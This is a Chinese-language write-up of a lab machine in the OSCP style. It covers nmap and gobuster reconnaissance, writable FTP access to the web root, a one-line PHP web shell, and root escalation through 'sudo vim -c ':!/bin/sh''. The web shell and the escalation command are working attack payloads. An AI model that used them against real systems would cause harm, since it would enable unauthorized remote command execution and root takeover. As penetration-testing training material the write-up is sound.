OSCP 靶场
靶场介绍
friendly |
easy |
ftp 利用、反弹shell、vim 提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
└─# nmap -sV -Pn -p- -T4 192.168.1.57
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-28 01:43 EST
Nmap scan report for 192.168.1.57
Host is up (0.00048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
80/tcp open http Apache httpd 2.4.54 ((Debian))
MAC Address: 08:00:27:A2:9F:C0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.24 seconds
目录扫描
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-lis
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.57
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/dire
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.57/.php (Status: 403) [Size: 277]
http://192.168.1.57/index.html (Status: 200) [Size: 10725]
http://192.168.1.57/.html (Status: 403) [Size: 277]
http://192.168.1.57/.php (Status: 403) [Size: 277]
http://192.168.1.57/.html (Status: 403) [Size: 277]
http://192.168.1.57/server-status (Status: 403) [Size: 277]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
权限获取
ftp里面存在一个index.html文件,下载后发现是web 服务的index.html 默认页面。
尝试上传一个文件到ftp,发现对应的目录是web 的根目录。
上传php 文件解析成功后,我们直接上传webshell获取权限
<?=`$_GET[0]`?>
为了方便操作我们反弹一个交互shell
权限提升
上面提示不知道用来干嘛,这里sudo -l 发现sudo可执行vim,执行如下命令直接提权到root 权限
sudo vim -c ':!/bin/sh'
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】friendly
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论